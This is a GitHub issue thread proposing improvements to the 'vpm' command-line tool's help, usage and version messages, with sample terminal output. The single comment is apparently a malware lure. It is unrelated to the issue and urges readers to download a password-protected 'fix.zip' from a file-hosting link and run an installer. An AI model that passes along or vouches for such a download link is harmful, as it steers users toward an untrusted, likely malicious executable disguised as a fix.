### ISSUE TITLE
vpm: improve messages

### ISSUE THREAD

**Issue by host6** [voedger/voedger#2541]
## Motivation

I have a nice idea how to improve the [quality](https://iso25000.com/index.php/en/iso-25000-standards/iso-25010) of the system. 

**Now, in current architecture**
- `version` cmd output: `0.0.1-alpha`
- help
  - no `vpm` tool description
  - bad help on `version` cmd: suggests flags `-h`, `-C`, `-v`
  - `Flags` and confusing `Global Flags` section whereas only `[flags]` pacleholder is printed in usage line
  - no `build` cmd description
  - confusing `build` cmd usage line:  `-C` and `-o` are mentioned twice`:
``` 
$ ./vpm build help
build

Usage:
  vpm build [-C] [-o <archive-name>] [flags]

Flags:
  -C, --change-dir string   change to dir before running the command. Any files named on the command line are interpreted after changing directories. If used, this flag must be the first one in the command line.
  -h, --help                help for build
  -o, --output string       output archive name

Global Flags:
      --trace     enable extremely verbose output
  -v, --verbose   enable verbose output
```

## Proposal

- `vpm` tool description without args: `vpm is a extensions manager for voedger framework`
- refactor `version` cmd output according to go-style: `vpm version 0.0.1-alpha`
- fix help messages
- print short usage if args missing, e.g.:
```
$ ./vpm baseline
'vpm baseline' accepts 1 arg(s)
usage: vpm baseline folder
```
instead of 
```
$ ./vpm baseline
'vpm baseline' accepts 1 arg(s). Run 'vpm baseline help'
```

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
